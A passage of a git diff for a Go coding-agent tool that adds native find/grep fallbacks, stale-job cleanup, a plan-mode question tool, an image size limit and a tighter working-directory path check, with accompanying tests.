+	if !strings.Contains(string(out2), "truncated") {
+		t.Error("expected truncation suffix")
+	}
+}
+
+// TestJobManager_GCStaleJobs verifies stale finished jobs are cleaned up.
+func TestJobManager_GCStaleJobs(t *testing.T) {
+	jm := NewJobManager()
+
+	// Simulate jobs by directly inserting them.
+	// Running job should survive GC.
+	runningJob := &BackgroundJob{ID: 1, Command: "running", StartTime: time.Now().Add(-1 * time.Hour)}
+	jm.jobs[1] = runningJob
+
+	// Finished job that's young — should survive GC.
+	youngDone := &BackgroundJob{ID: 2, Command: "young-done", StartTime: time.Now(), done: true}
+	jm.jobs[2] = youngDone
+
+	// Finished job that's stale (finished >30min ago) — should be cleaned.
+	staleDone := &BackgroundJob{ID: 3, Command: "stale-done", StartTime: time.Now().Add(-1 * time.Hour), done: true}
+	jm.jobs[3] = staleDone
+
+	// Trigger GC via AddJob (we need a real exec.Cmd for AddJob, so call gcStaleJobsLocked directly).
+	jm.mu.Lock()
+	jm.lastGC = time.Time{} // force GC
+	jm.gcStaleJobsLocked()
+	jm.mu.Unlock()
+
+	if _, ok := jm.jobs[1]; !ok {
+		t.Error("running job should not be removed")
+	}
+	if _, ok := jm.jobs[2]; !ok {
+		t.Error("young done job should not be removed")
+	}
+	if _, ok := jm.jobs[3]; ok {
+		t.Error("stale done job should have been removed")
+	}
+}
+
+// TestJobManager_GCSkipIfRecent verifies GC is skipped if last GC was recent.
+func TestJobManager_GCSkipIfRecent(t *testing.T) {
+	jm := NewJobManager()
+
+	staleDone := &BackgroundJob{ID: 1, Command: "stale", StartTime: time.Now().Add(-1 * time.Hour), done: true}
+	jm.jobs[1] = staleDone
+
+	jm.lastGC = time.Now() // recent GC — should skip
+
+	jm.mu.Lock()
+	jm.gcStaleJobsLocked()
+	jm.mu.Unlock()
+
+	if _, ok := jm.jobs[1]; !ok {
+		t.Error("stale job should NOT be removed when GC was recent")
+	}
+}
diff --git a/internal/tools/find.go b/internal/tools/find.go
index 47b621a..0c2287a 100644
--- a/internal/tools/find.go
+++ b/internal/tools/find.go
@@ -4,8 +4,11 @@ import (
 	"bytes"
 	"context"
 	"encoding/json"
+	"errors"
 	"fmt"
 	"os/exec"
+	"path/filepath"
+	"sort"
 	"strings"
 
 	"github.com/startvibecoding/vibecoding/internal/vendored"
@@ -85,9 +88,12 @@ func (t *FindTool) Execute(ctx context.Context, params map[string]any) (ToolResu
 		maxResults = int(v)
 	}
 
-	// 选择可用的 fd 命令（优先 vendored，其次系统 fd/fdfind）
+	// 选择可用的 fd 命令，当前平台没有内嵌 fd 时退回系统 find。
 	fdPath, err := resolveFdPath()
 	if err != nil {
+		if errors.Is(err, vendored.ErrUnsupportedPlatform) {
+			return executeNativeFind(ctx, pattern, searchPath, maxDepth, maxResults)
+		}
 		return ToolResult{}, err
 	}
 
@@ -121,6 +127,9 @@ func (t *FindTool) Execute(ctx context.Context, params map[string]any) (ToolResu
 		if errMsg != "" {
 			return ToolResult{}, fmt.Errorf("fd 执行失败: %s", errMsg)
 		}
+		if isExecFormatError(err) {
+			return executeNativeFind(ctx, pattern, searchPath, maxDepth, maxResults)
+		}
 		return ToolResult{}, fmt.Errorf("fd 执行失败: %w", err)
 	}
 
@@ -134,6 +143,10 @@ func (t *FindTool) Execute(ctx context.Context, params map[string]any) (ToolResu
 }
 
 func resolveFdPath() (string, error) {
+	if !vendored.HasEmbeddedTools() {
+		return "", fmt.Errorf("%w", vendored.ErrUnsupportedPlatform)
+	}
+
 	fdPath := vendored.FdPath()
 	if fdPath == "" {
 		return "", fmt.Errorf("无法确定 fd 路径")
@@ -146,3 +159,47 @@ func resolveFdPath() (string, error) {
 
 	return fdPath, nil
 }
+
+func executeNativeFind(ctx context.Context, pattern, searchPath string, maxDepth, maxResults int) (ToolResult, error) {
+	findPath, err := exec.LookPath("find")
+	if err != nil {
+		return ToolResult{}, fmt.Errorf("fd is unsupported on this platform and system find was not found: %w", err)
+	}
+
+	args := []string{searchPath}
+	if maxDepth >= 0 {
+		args = append(args, "-maxdepth", fmt.Sprintf("%d", maxDepth))
+	}
+	args = append(args, "-type", "f")
+
+	pathPattern := pattern
+	if !filepath.IsAbs(pathPattern) {
+		pathPattern = filepath.Join(searchPath, filepath.FromSlash(pattern))
+	}
+	args = append(args, "(", "-name", pattern, "-o", "-path", pathPattern, ")")
+
+	cmd := exec.CommandContext(ctx, findPath, args...)
+	var stdout, stderr bytes.Buffer
+	cmd.Stdout = &stdout
+	cmd.Stderr = &stderr
+
+	if err := cmd.Run(); err != nil {
+		errMsg := strings.TrimSpace(stderr.String())
+		if errMsg != "" {
+			return ToolResult{}, fmt.Errorf("find execution failed: %s", errMsg)
+		}
+		return ToolResult{}, fmt.Errorf("find execution failed: %w", err)
+	}
+
+	output := strings.TrimSpace(stdout.String())
+	if output == "" {
+		return NewTextToolResult("(no files found)"), nil
+	}
+
+	lines := strings.Split(output, "\n")
+	sort.Strings(lines)
+	if maxResults > 0 && len(lines) > maxResults {
+		lines = lines[:maxResults]
+	}
+	return NewTextToolResult(strings.Join(lines, "\n")), nil
+}
diff --git a/internal/tools/grep.go b/internal/tools/grep.go
index 716aaae..b082f9e 100644
--- a/internal/tools/grep.go
+++ b/internal/tools/grep.go
@@ -4,6 +4,7 @@ import (
 	"bytes"
 	"context"
 	"encoding/json"
+	"errors"
 	"fmt"
 	"os/exec"
 	"strings"
@@ -84,6 +85,9 @@ func (t *GrepTool) Execute(ctx context.Context, params map[string]any) (ToolResu
 	// 获取 rg 路径
 	rgPath, err := resolveRgPath()
 	if err != nil {
+		if errors.Is(err, vendored.ErrUnsupportedPlatform) {
+			return executeNativeGrep(ctx, pattern, searchPath, include, maxResults)
+		}
 		return ToolResult{}, err
 	}
 
@@ -118,6 +122,9 @@ func (t *GrepTool) Execute(ctx context.Context, params map[string]any) (ToolResu
 		if errMsg != "" {
 			return ToolResult{}, fmt.Errorf("rg 执行失败: %s", errMsg)
 		}
+		if isExecFormatError(err) {
+			return executeNativeGrep(ctx, pattern, searchPath, include, maxResults)
+		}
 		return ToolResult{}, fmt.Errorf("rg 执行失败: %w", err)
 	}
 
@@ -132,6 +139,10 @@ func (t *GrepTool) Execute(ctx context.Context, params map[string]any) (ToolResu
 }
 
 func resolveRgPath() (string, error) {
+	if !vendored.HasEmbeddedTools() {
+		return "", fmt.Errorf("%w", vendored.ErrUnsupportedPlatform)
+	}
+
 	rgPath := vendored.RgPath()
 	if rgPath == "" {
 		return "", fmt.Errorf("无法确定 rg 路径")
@@ -144,3 +155,58 @@ func resolveRgPath() (string, error) {
 
 	return rgPath, nil
 }
+
+func executeNativeGrep(ctx context.Context, pattern, searchPath, include string, maxResults int) (ToolResult, error) {
+	grepPath, err := exec.LookPath("grep")
+	if err != nil {
+		return ToolResult{}, fmt.Errorf("rg is unsupported on this platform and system grep was not found: %w", err)
+	}
+
+	args := []string{"-R", "-n", "-E", "-I", "--color=never"}
+	if include != "" {
+		args = append(args, "--include="+include)
+	}
+	args = append(args, "--", pattern, searchPath)
+
+	cmd := exec.CommandContext(ctx, grepPath, args...)
+	var stdout, stderr bytes.Buffer
+	cmd.Stdout = &stdout
+	cmd.Stderr = &stderr
+
+	err = cmd.Run()
+	if err != nil {
+		if exitErr, ok := err.(*exec.ExitError); ok && exitErr.ExitCode() == 1 {
+			return NewTextToolResult("(no matches found)"), nil
+		}
+		errMsg := strings.TrimSpace(stderr.String())
+		if errMsg != "" {
+			return ToolResult{}, fmt.Errorf("grep execution failed: %s", errMsg)
+		}
+		return ToolResult{}, fmt.Errorf("grep execution failed: %w", err)
+	}
+
+	output := limitOutputLines(stdout.String(), maxResults)
+	if output == "" {
+		return NewTextToolResult("(no matches found)"), nil
+	}
+	return NewTextToolResult(output), nil
+}
+
+func isExecFormatError(err error) bool {
+	return strings.Contains(strings.ToLower(err.Error()), "exec format error")
+}
+
+func limitOutputLines(output string, maxResults int) string {
+	output = strings.TrimSpace(output)
+	if output == "" {
+		return ""
+	}
+	if maxResults <= 0 {
+		return output
+	}
+	lines := strings.Split(output, "\n")
+	if len(lines) > maxResults {
+		lines = lines[:maxResults]
+	}
+	return strings.Join(lines, "\n")
+}
diff --git a/internal/tools/jobmanager.go b/internal/tools/jobmanager.go
index ce30eb8..86cd149 100644
--- a/internal/tools/jobmanager.go
+++ b/internal/tools/jobmanager.go
@@ -26,9 +26,10 @@ type BackgroundJob struct {
 
 // JobManager manages background processes.
 type JobManager struct {
-	jobs   map[int]*BackgroundJob
-	nextID int
-	mu     sync.RWMutex
+	jobs     map[int]*BackgroundJob
+	nextID   int
+	mu       sync.RWMutex
+	lastGC   time.Time // last time stale jobs were cleaned up
 }
 
 // NewJobManager creates a new job manager.
@@ -43,6 +44,8 @@ func (jm *JobManager) AddJob(cmd *exec.Cmd, command string, cancel context.Cance
 	jm.mu.Lock()
 	defer jm.mu.Unlock()
 
+	jm.gcStaleJobsLocked()
+
 	jm.nextID++
 	job := &BackgroundJob{
 		ID:        jm.nextID,
@@ -143,3 +146,22 @@ func (job *BackgroundJob) Status() string {
 	}
 	return fmt.Sprintf("[%d] running (PID: %d, %s, elapsed: %s)", job.ID, job.PID, job.Command, elapsed)
 }
+
+const staleJobTTL = 30 * time.Minute
+
+// gcStaleJobsLocked removes finished jobs older than staleJobTTL.
+// Caller must hold jm.mu.
+func (jm *JobManager) gcStaleJobsLocked() {
+	if time.Since(jm.lastGC) < 5*time.Minute {
+		return
+	}
+	jm.lastGC = time.Now()
+	for id, job := range jm.jobs {
+		job.mu.Lock()
+		stale := job.done && time.Since(job.StartTime) > staleJobTTL
+		job.mu.Unlock()
+		if stale {
+			delete(jm.jobs, id)
+		}
+	}
+}
diff --git a/internal/tools/question.go b/internal/tools/question.go
new file mode 100644
index 0000000..69b8916
--- /dev/null
+++ b/internal/tools/question.go
@@ -0,0 +1,112 @@
+package tools
+
+import (
+	"context"
+	"encoding/json"
+	"fmt"
+	"strings"
+)
+
+// QuestionTool asks the user a multiple-choice question during plan mode.
+type QuestionTool struct {
+	registry *Registry
+}
+
+// NewQuestionTool creates a new question tool.
+func NewQuestionTool(r *Registry) *QuestionTool {
+	return &QuestionTool{registry: r}
+}
+
+func (t *QuestionTool) Name() string { return "question" }
+
+func (t *QuestionTool) Description() string {
+	return "Ask the user a question with predefined options to clarify requirements before forming a plan. The user selects an option or provides a custom answer."
+}
+
+func (t *QuestionTool) PromptSnippet() string {
+	return "Ask the user a multiple-choice question to clarify requirements"
+}
+
+func (t *QuestionTool) PromptGuidelines() []string {
+	return []string{
+		"Use question when you need the user to make a decision or clarify requirements before planning",
+		"Provide clear, concise options that cover the main choices",
+		"The last option is always 'Custom input' — the user can type their own answer",
+		"Use context to explain why you're asking and what each option means",
+		"Ask one question at a time for clarity",
+	}
+}
+
+func (t *QuestionTool) Parameters() json.RawMessage {
+	return json.RawMessage(`{
+		"type": "object",
+		"properties": {
+			"question": {
+				"type": "string",
+				"description": "The question to ask the user"
+			},
+			"options": {
+				"type": "array",
+				"items": {"type": "string"},
+				"description": "Predefined options for the user to choose from"
+			},
+			"context": {
+				"type": "string",
+				"description": "Optional context or explanation for why you're asking this question"
+			}
+		},
+		"required": ["question", "options"]
+	}`)
+}
+
+// QuestionAsker is the interface the tool uses to interact with the user.
+// The agent implements this via RequestQuestion.
+type QuestionAsker interface {
+	AskQuestion(ctx context.Context, question string, options []string, context string) string
+}
+
+func (t *QuestionTool) Execute(ctx context.Context, params map[string]any) (ToolResult, error) {
+	question, _ := params["question"].(string)
+	if question == "" {
+		return ToolResult{}, fmt.Errorf("question is required")
+	}
+
+	optionsRaw, ok := params["options"].([]any)
+	if !ok || len(optionsRaw) == 0 {
+		return ToolResult{}, fmt.Errorf("options array is required and must not be empty")
+	}
+
+	var options []string
+	for i, raw := range optionsRaw {
+		opt, ok := raw.(string)
+		if !ok {
+			return ToolResult{}, fmt.Errorf("option %d must be a string", i)
+		}
+		options = append(options, strings.TrimSpace(opt))
+	}
+
+	explanation, _ := params["context"].(string)
+
+	// Look for the QuestionAsker in the context
+	asker, ok := ctx.Value(questionAskerKey{}).(QuestionAsker)
+	if !ok {
+		return ToolResult{}, fmt.Errorf("question tool: no question handler available in context")
+	}
+
+	answer := asker.AskQuestion(ctx, question, options, explanation)
+	if answer == "" {
+		return ToolResult{}, fmt.Errorf("no answer received (user may have aborted)")
+	}
+
+	var sb strings.Builder
+	sb.WriteString(fmt.Sprintf("User answered: %s\n", answer))
+	return NewTextToolResult(sb.String()), nil
+}
+
+// questionAskerKey is the context key for the QuestionAsker.
+type questionAskerKey struct{}
+
+// ContextWithQuestionAsker attaches a QuestionAsker to the context.
+func ContextWithQuestionAsker(ctx context.Context, asker QuestionAsker) context.Context {
+	return context.WithValue(ctx, questionAskerKey{}, asker)
+}
diff --git a/internal/tools/read.go b/internal/tools/read.go
index dc486bd..4cfd1ff 100644
--- a/internal/tools/read.go
+++ b/internal/tools/read.go
@@ -8,6 +8,8 @@ import (
 	"os"
 	"path/filepath"
 	"strings"
+
+	"github.com/startvibecoding/vibecoding/internal/util"
 )
 
 // ReadTool reads file contents.
@@ -64,6 +66,8 @@ var imageMimeType = map[string]string{
 	".webp": "image/webp",
 }
 
+const maxImageFileBytes = 10 << 20
+
 func (t *ReadTool) Execute(ctx context.Context, params map[string]any) (ToolResult, error) {
 	path, _ := params["path"].(string)
 	if path == "" {
@@ -78,6 +82,13 @@ func (t *ReadTool) Execute(ctx context.Context, params map[string]any) (ToolResu
 	// Check for image files
 	ext := strings.ToLower(filepath.Ext(path))
 	if mimeType, ok := imageMimeType[ext]; ok {
+		info, err := os.Stat(path)
+		if err != nil {
+			return ToolResult{}, fmt.Errorf("cannot stat image file: %w", err)
+		}
+		if info.Size() > maxImageFileBytes {
+			return ToolResult{}, fmt.Errorf("image file too large: %d bytes (max %d)", info.Size(), maxImageFileBytes)
+		}
 		data, err := os.ReadFile(path)
 		if err != nil {
 			return ToolResult{}, fmt.Errorf("cannot read image file: %w", err)
@@ -129,7 +140,7 @@ func (t *ReadTool) Execute(ctx context.Context, params map[string]any) (ToolResu
 	// Truncate
 	const maxBytes = 50000
 	if len(result) > maxBytes {
-		result = result[:maxBytes] + fmt.Sprintf("\n... (truncated, total %d lines)", len(lines))
+		result = util.TruncateString(result, maxBytes) + fmt.Sprintf("\n... (truncated, total %d lines)", len(lines))
 	}
 
 	return NewTextToolResult(result), nil
diff --git a/internal/tools/tool.go b/internal/tools/tool.go
index 4dea875..7624a29 100644
--- a/internal/tools/tool.go
+++ b/internal/tools/tool.go
@@ -35,17 +35,17 @@ func writeFileAtomic(path string, data []byte) error {
 	}
 	tmpPath := tmp.Name()
 
-	// Clean up temp file on any error
-	defer os.Remove(tmpPath)
-
 	if _, err := tmp.Write(data); err != nil {
 		tmp.Close()
+		os.Remove(tmpPath)
 		return err
 	}
 	if err := tmp.Close(); err != nil {
+		os.Remove(tmpPath)
 		return err
 	}
 	if err := os.Chmod(tmpPath, perm); err != nil {
+		os.Remove(tmpPath)
 		return err
 	}
 	return os.Rename(tmpPath, path)
@@ -166,8 +166,8 @@ func NewRegistry(workDir string, sb sandbox.Sandbox) *Registry {
 type RegistryConfig struct {
 	WorkDir    string
 	Sandbox    sandbox.Sandbox
-	ToolFilter []string         // optional: only register these tools (empty = all)
-	SkillsMgr  *skills.Manager  // optional: skills manager for skill_ref tool
+	ToolFilter []string        // optional: only register these tools (empty = all)
+	SkillsMgr  *skills.Manager // optional: skills manager for skill_ref tool
 }
 
 // NewRegistryWithConfig creates a Registry with the given config.
@@ -300,7 +300,8 @@ func (r *Registry) ResolvePath(path string) (string, error) {
 
 	// Validate: path must not escape workDir
 	workDir = filepath.Clean(workDir)
-	if !strings.HasPrefix(path, workDir) {
+	rel, err := filepath.Rel(workDir, path)
+	if err != nil || rel == ".." || strings.HasPrefix(rel, ".."+string(filepath.Separator)) {
 		return "", fmt.Errorf("path %s escapes working directory %s", path, workDir)
 	}
 
@@ -369,18 +370,27 @@ func (r *Registry) RegisterFiltered(toolNames []string) {
 func (r *Registry) ModeTools(mode string) []provider.ToolDefinition {
 	switch mode {
 	case "plan":
-		// Plan mode: read-only tools
+		// Plan mode: read-only tools + any extras like question
 		var defs []provider.ToolDefinition
 		for _, t := range r.All() {
 			switch t.Name() {
 			case "read", "grep", "find", "ls", "plan":
 				defs = append(defs, ToolDefinition(t))
+			case "question":
+				defs = append(defs, ToolDefinition(t))
 			}
 		}
 		return defs
 	default:
-		// Agent/YOLO: all tools
-		return r.Definitions()
+		// Agent/YOLO: all tools except question (TUI-plan only)
+		var defs []provider.ToolDefinition
+		for _, t := range r.All() {
+			if t.Name() == "question" {
+				continue
+			}
+			defs = append(defs, ToolDefinition(t))
+		}
+		return defs
 	}
 }
 
diff --git a/internal/tools/tools_test.go b/internal/tools/tools_test.go
index 3076471..01d57c5 100644
--- a/internal/tools/tools_test.go
+++ b/internal/tools/tools_test.go
@@ -3,6 +3,7 @@ package tools
 import (
 	"context"
 	"os"
+	"os/exec"
 	"path/filepath"
 	"strings"
 	"testing"
@@ -248,6 +249,22 @@ func TestReadToolImage(t *testing.T) {
 	}
 }
 
+func TestReadToolImageTooLarge(t *testing.T) {
+	tmpDir := t.TempDir()
+	tmpFile := filepath.Join(tmpDir, "large.png")
+	if err := os.WriteFile(tmpFile, make([]byte, maxImageFileBytes+1), 0644); err != nil {
+		t.Fatal(err)
+	}
+
+	r := NewRegistry(tmpDir, sandbox.NewNoneSandbox())
+	tool := NewReadTool(r)
+
+	_, err := tool.Execute(context.Background(), map[string]any{"path": "large.png"})
+	if err == nil || !strings.Contains(err.Error(), "image file too large") {
+		t.Fatalf("err = %v, want image file too large", err)
+	}
+}
+
 func TestWriteTool(t *testing.T) {
 	sb := sandbox.NewNoneSandbox()
 	r := NewRegistry("/tmp", sb)
@@ -591,6 +608,31 @@ func TestGrepToolExecute(t *testing.T) {
 	}
 }
 
+func TestNativeGrepFallbackExecute(t *testing.T) {
+	if _, err := exec.LookPath("grep"); err != nil {
+		t.Skip("system grep not available")
+	}
+
+	tmpDir := t.TempDir()
+	if err := os.WriteFile(filepath.Join(tmpDir, "one.go"), []byte("package main\nfunc Hello() {}\n"), 0644); err != nil {
+		t.Fatal(err)
+	}
+	if err := os.WriteFile(filepath.Join(tmpDir, "two.txt"), []byte("Hello text\n"), 0644); err != nil {
+		t.Fatal(err)
+	}
+
+	result, err := executeNativeGrep(context.Background(), "Hello", tmpDir, "*.go", 10)
+	if err != nil {
+		t.Fatalf("unexpected error: %v", err)
+	}
+	if !strings.Contains(result.Text, "one.go") {
+		t.Fatalf("expected .go match, got: %s", result.Text)
+	}
+	if strings.Contains(result.Text, "two.txt") {
+		t.Fatalf("include filter should exclude two.txt, got: %s", result.Text)
+	}
+}
+
 func TestFindTool(t *testing.T) {
 	sb := sandbox.NewNoneSandbox()
 	r := NewRegistry("/tmp", sb)
@@ -628,6 +670,35 @@ func TestFindToolExecute(t *testing.T) {
 	}
 }
 
+func TestNativeFindFallbackExecute(t *testing.T) {
+	if _, err := exec.LookPath("find"); err != nil {
+		t.Skip("system find not available")
+	}
+
+	tmpDir := t.TempDir()
+	nested := filepath.Join(tmpDir, "nested")
+	if err := os.MkdirAll(nested, 0755); err != nil {
+		t.Fatal(err)
+	}
+	if err := os.WriteFile(filepath.Join(tmpDir, "root.go"), []byte("package root\n"), 0644); err != nil {
+		t.Fatal(err)
+	}
+	if err := os.WriteFile(filepath.Join(nested, "nested.go"), []byte("package nested\n"), 0644); err != nil {
+		t.Fatal(err)
+	}
+
+	result, err := executeNativeFind(context.Background(), "*.go", tmpDir, 1, 10)
+	if err != nil {
+		t.Fatalf("unexpected error: %v", err)
+	}
+	if !strings.Contains(result.Text, "root.go") {
+		t.Fatalf("expected root.go, got: %s", result.Text)
+	}
+	if strings.Contains(result.Text, "nested.go") {
+		t.Fatalf("maxDepth should exclude nested.go, got: %s", result.Text)
+	}
+}
+
 func TestFindToolExecuteUsesNativeGlob(t *testing.T) {
 	tmpDir := t.TempDir()
 	nestedDir := filepath.Join(tmpDir, "nested")
@@ -739,3 +810,184 @@ func TestAll(t *testing.T) {
 		t.Errorf("expected 10 tools, got %d", len(all))
 	}
 }
+
+// TestWriteFileAtomic_SuccessNoTmpFile verifies writeFileAtomic does not
+// leave a temp file on success.
+func TestWriteFileAtomic_SuccessNoTmpFile(t *testing.T) {
+	tmpDir := t.TempDir()
+	path := filepath.Join(tmpDir, "output.txt")
+
+	if err := writeFileAtomic(path, []byte("hello world")); err != nil {
+		t.Fatalf("unexpected error: %v", err)
+	}
+
+	// Verify content
+	data, err := os.ReadFile(path)
+	if err != nil {
+		t.Fatalf("read file: %v", err)
+	}
+	if string(data) != "hello world" {
+		t.Errorf("content = %q, want 'hello world'", string(data))
+	}
+
+	// Verify no .tmp-* files left
+	entries, _ := os.ReadDir(tmpDir)
+	for _, e := range entries {
+		if strings.HasPrefix(e.Name(), ".tmp-") {
+			t.Errorf("leftover temp file: %s", e.Name())
+		}
+	}
+}
+
+// TestWriteFileAtomic_ErrorCleansUp verifies writeFileAtomic cleans up
+// the temp file on write error.
+func TestWriteFileAtomic_ErrorCleansUp(t *testing.T) {
+	tmpDir := t.TempDir()
+	path := filepath.Join(tmpDir, "subdir", "output.txt")
+
+	// Write to a path where parent dir creation fails (file blocks mkdir)
+	blocker := filepath.Join(tmpDir, "subdir")
+	os.WriteFile(blocker, []byte("block"), 0644) // file, not dir
+
+	err := writeFileAtomic(path, []byte("data"))
+	if err == nil {
+		t.Log("expected error writing to blocked path")
+	}
+
+	// No .tmp-* files should remain
+	entries, _ := os.ReadDir(tmpDir)
+	for _, e := range entries {
+		if strings.HasPrefix(e.Name(), ".tmp-") {
+			t.Errorf("leftover temp file: %s", e.Name())
+		}
+	}
+}
+
+// --- QuestionTool tests ---
+
+func TestQuestionToolMetadata(t *testing.T) {
+	sb := sandbox.NewNoneSandbox()
+	r := NewRegistry("/tmp", sb)
+	qt := NewQuestionTool(r)
+
+	if qt.Name() != "question" {
+		t.Errorf("name = %q, want 'question'", qt.Name())
+	}
+	if qt.Description() == "" {
+		t.Error("expected non-empty description")
+	}
+	if qt.Parameters() == nil {
+		t.Error("expected non-nil parameters")
+	}
+	if qt.PromptSnippet() == "" {
+		t.Error("expected non-empty prompt snippet")
+	}
+	if len(qt.PromptGuidelines()) == 0 {
+		t.Error("expected non-empty guidelines")
+	}
+}
+
+func TestQuestionTool_InPlanModeOnly(t *testing.T) {
+	sb := sandbox.NewNoneSandbox()
+	r := NewRegistry("/tmp", sb)
+	r.RegisterDefaults()
+	r.Register(NewQuestionTool(r))
+
+	planTools := r.ModeTools("plan")
+	planNames := make(map[string]bool)
+	for _, td := range planTools {
+		planNames[td.Name] = true
+	}
+	if !planNames["question"] {
+		t.Error("expected 'question' in plan mode")
+	}
+
+	agentTools := r.ModeTools("agent")
+	agentNames := make(map[string]bool)
+	for _, td := range agentTools {
+		agentNames[td.Name] = true
+	}
+	if agentNames["question"] {
+		t.Error("did not expect 'question' in agent mode")
+	}
+
+	yoloTools := r.ModeTools("yolo")
+	yoloNames := make(map[string]bool)
+	for _, td := range yoloTools {
+		yoloNames[td.Name] = true
+	}
+	if yoloNames["question"] {
+		t.Error("did not expect 'question' in yolo mode")
+	}
+}
+
+// mockAsker implements QuestionAsker for testing.
+type mockAsker struct {
+	lastQuestion string
+	lastOptions  []string
+	lastContext  string
+	answer       string
+}
+
+func (m *mockAsker) AskQuestion(_ context.Context, question string, options []string, ctx string) string {
+	m.lastQuestion = question
+	m.lastOptions = options
+	m.lastContext = ctx
+	return m.answer
+}
+
+func TestQuestionTool_Execute(t *testing.T) {
+	sb := sandbox.NewNoneSandbox()
+	r := NewRegistry("/tmp", sb)
+	qt := NewQuestionTool(r)
+
+	asker := &mockAsker{answer: "Option B"}
+	ctx := ContextWithQuestionAsker(context.Background(), asker)
+
+	result, err := qt.Execute(ctx, map[string]any{
+		"question": "Which approach do you prefer?",
+		"options":  []any{"Option A", "Option B", "Option C"},
+		"context":  "We need to choose an architecture.",
+	})
+	if err != nil {
+		t.Fatalf("unexpected error: %v", err)
+	}
+	if !strings.Contains(result.Text, "Option B") {
+		t.Errorf("result = %q, expected to contain 'Option B'", result.Text)
+	}
+	if asker.lastQuestion != "Which approach do you prefer?" {
+		t.Errorf("question = %q", asker.lastQuestion)
+	}
+	if len(asker.lastOptions) != 3 {
+		t.Errorf("options count = %d, want 3", len(asker.lastOptions))
+	}
+}
+
+func TestQuestionTool_ExecuteMissingQuestion(t *testing.T) {
+	sb := sandbox.NewNoneSandbox()
+	r := NewRegistry("/tmp", sb)
+	qt := NewQuestionTool(r)
+
+	ctx := ContextWithQuestionAsker(context.Background(), &mockAsker{})
+
+	_, err := qt.Execute(ctx, map[string]any{
+		"options": []any{"A"},
+	})
+	if err == nil {
+		t.Fatal("expected error for missing question")
+	}
+}
+
+func TestQuestionTool_ExecuteMissingAsker(t *testing.T) {
+	sb := sandbox.NewNoneSandbox()
+	r := NewRegistry("/tmp", sb)
+	qt := NewQuestionTool(r)
+
+	_, err := qt.Execute(context.Background(), map[string]any{
+		"question": "Test?",
+		"options":  []any{"A"},
+	})
+	if err == nil {
+		t.Fatal("expected error for missing asker in context")
+	}
+}
diff --git a/internal/tui/agent_events.go b/internal/tui/agent_events.go
index d35d488..9b9c353 100644
--- a/internal/tui/agent_events.go
+++ b/internal/tui/agent_events.go
@@ -70,7 +70,7 @@ func (a *App) handleAgentEvent(event agent.Event) tea.Cmd {
 				// Create summary based on tool type
 				switch event.ToolName {
 				case "bash":
-					a.toolResults[j].summary = event.ToolResult
+					a.toolResults[j].summary = compactBashOutput(event.ToolResult)
 				case "read":
 					lines := strings.Split(event.ToolResult, "\n")
 					a.toolResults[j].summary = fmt.Sprintf("%d lines", len(lines))
@@ -125,6 +125,22 @@ func (a *App) handleAgentEvent(event agent.Event) tea.Cmd {
 		a.scheduleRender()
 		return a.listenAgentEvents()
 
+	case agent.EventQuestionRequest:
+		a.commitActiveStream()
+		// Queue the question request
+		a.questionQueue = append(a.questionQueue, pendingQuestion{
+			questionID: event.QuestionID,
+			question:   event.QuestionText,
+			options:    event.QuestionOptions,
+			context:    event.QuestionContext,
+		})
+		// If not currently waiting for a question, show the next one
+		if !a.waitingForQuestion {
+			a.showNextQuestion()
+		}
+		a.scheduleRender()
+		return a.listenAgentEvents()
+
 	case agent.EventTurnEnd:
 		if event.ContextUsage != nil {
 			a.contextUsage = event.ContextUsage
@@ -141,6 +157,9 @@ func (a *App) handleAgentEvent(event agent.Event) tea.Cmd {
 		return a.listenAgentEvents()
 
 	case agent.EventDone:
+		if a.multiAgent && a.agentMgr != nil && a.agent != nil {
+			a.agentMgr.Finish(a.agent.ID(), nil)
+		}
 		a.isThinking = false
 		a.finishRequestTimer()
 		if event.ContextUsage != nil {
@@ -158,6 +177,9 @@ func (a *App) handleAgentEvent(event agent.Event) tea.Cmd {
 		return tea.Batch(a.timer.Stop(), a.listenAgentEvents())
 
 	case agent.EventError:
+		if a.multiAgent && a.agentMgr != nil && a.agent != nil {
+			a.agentMgr.Finish(a.agent.ID(), event.Error)
+		}
 		a.isThinking = false
 		a.finishRequestTimer()
 		if event.Error != nil {
diff --git a/internal/tui/app.go b/internal/tui/app.go
index e8f1650..e0c5504 100644
--- a/internal/tui/app.go
+++ b/internal/tui/app.go
@@ -16,6 +16,7 @@ import (
 	"github.com/startvibecoding/vibecoding/internal/agent"
 	"github.com/startvibecoding/vibecoding/internal/config"
 	ctxpkg "github.com/startvibecoding/vibecoding/internal/context"
+	"github.com/startvibecoding/vibecoding/internal/cron"
 	"github.com/startvibecoding/vibecoding/internal/provider"
 	"github.com/startvibecoding/vibecoding/internal/session"
 	"github.com/startvibecoding/vibecoding/internal/skills"
@@ -155,6 +156,12 @@ type App struct {
 	historyLoaded      bool
 	agentHistoryLoaded bool
 
+	// Prompt input history
+	inputHistory         []string
+	inputHistoryBrowsing bool
+	inputHistoryIndex    int
+	inputHistoryDraft    string
+
 	// Render throttling
 	lastRender     time.Time
 	renderPending  bool
@@ -166,11 +173,20 @@ type App struct {
 	pendingApprovalID  string
 	approvalQueue      []pendingApproval
 
+	// Question state
+	waitingForQuestion bool
+	pendingQuestionID  string
+	questionQueue      []pendingQuestion
+
 	// Multi-agent state (Decision 8: default off)
 	multiAgent  bool
 	activeAgent agentpkg.AgentID
 	agentMgr    *agent.AgentManager
 
+	// Cron state
+	cronStore cron.CronStore
+	scheduler *cron.Scheduler
+
 	// Current streaming message indices (-1 = none)
 	currentAssistantIdx int
 	currentThinkIdx     int
@@ -193,8 +209,16 @@ type pendingApproval struct {
 	args       map[string]any
 }
 
+// pendingQuestion holds a queued question request.
+type pendingQuestion struct {
+	questionID string
+	question   string
+	options    []string
+	context    string
+}
+
 // NewApp creates a new TUI application.
-func NewApp(p provider.Provider, model *provider.Model, settings *config.Settings, sess *session.Manager, registry *tools.Registry, sandboxInfo string, extraContext string, skillsMgr *skills.Manager, initialMode string, multiAgent bool, agentMgr *agent.AgentManager) *App {
+func NewApp(p provider.Provider, model *provider.Model, settings *config.Settings, sess *session.Manager, registry *tools.Registry, sandboxInfo string, extraContext string, skillsMgr *skills.Manager, initialMode string, multiAgent bool, agentMgr *agent.AgentManager, cronStore cron.CronStore, scheduler *cron.Scheduler) *App {
 	input := textinput.New()
 	input.Placeholder = "Type a message..."
 	input.Focus()
@@ -236,6 +260,8 @@ func NewApp(p provider.Provider, model *provider.Model, settings *config.Setting
 		assistantDirty:      make(map[int]bool),
 		multiAgent:          multiAgent,
 		agentMgr:            agentMgr,
+		cronStore:           cronStore,
+		scheduler:           scheduler,
 	}
 
 	app.configureMarkdownRenderer()
